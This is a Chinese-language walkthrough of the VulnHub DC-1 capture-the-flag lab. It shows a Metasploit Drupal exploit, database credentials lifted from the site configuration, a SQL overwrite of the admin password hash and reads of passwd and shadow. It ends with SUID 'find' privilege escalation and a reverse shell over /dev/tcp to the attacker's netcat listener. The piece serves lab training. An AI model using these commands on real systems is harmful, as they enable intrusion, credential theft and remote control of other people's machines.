vulnhub靶机DC1

靶机DC1下载地址：https://www.vulnhub.com/entry/dc-1,292/
kali ip：192.168.70.129
靶机DC1IP：192.168.70.160

一、信息搜集

靶机ip发现

端口扫描

进行目录扫描，并没发现什么可以利用的目录

二、漏洞利用

使用msf查找drupal的漏洞
命令:search drupal

这里选择一个最新的漏洞，设置rhost即可

成功接收会话

查看flag1

所有好的cmd都需要一个配置文件，和你一样
查到drupal的配置文件所在目录为：/var/www/sites/default/
查看配置文件

暴力破解和字典攻击不是
*只有获得访问权限的方式（您将需要访问权限）。

• 您可以使用这些凭据执行哪些操作？
  

再往下看到mysql的账号密码

Username：dbuser Passwd：R0ck3t

使用python开一个交互式窗口并进行mysql连接

python -c ‘import pty; pty.spawn(“/bin/bash”)’

查询drupaldb数据库和表users

发现账号密码

发现密码是加密的，这里可以选择对账号的密码进行替换

www-data@DC-1:/var/www$ php scripts/password-hash.sh ycx
password: ycx hash:
$S$DmVn5QNQW0UeWa6YUX2dKoAlRmmo3KsYuEMb1OstHXhC0AMEwe5D

查看users的表结构

使用update将admin的数据进行替换

也可以使用脚本进行攻击，这样更方便一些

这里只测试了自带的重置密码
这里就修改成功了，登录一下网页试试看

在网页中的dashbroad找到flag3

特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取shadow中的东西。
查看passwd和shadow文件

查看shadow权限不足
从passwd得知flag4
在flag4的账户中找到flag4

三、提权

可以使用LinEnum脚本进行扫描
使用find命令查找有root权限文件
发现命令find可以提权

 find `which find` -exec whoami \;
1

#命令解释： 以find 命令 执行 whoami 命令。 # find (一个路径或文件必须存在) -exec 执行命令 （结束）;

find反弹shell

find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.70.129/9999 0>&1 \;
1

使用nc接收反弹会话
nc -lvvp 9999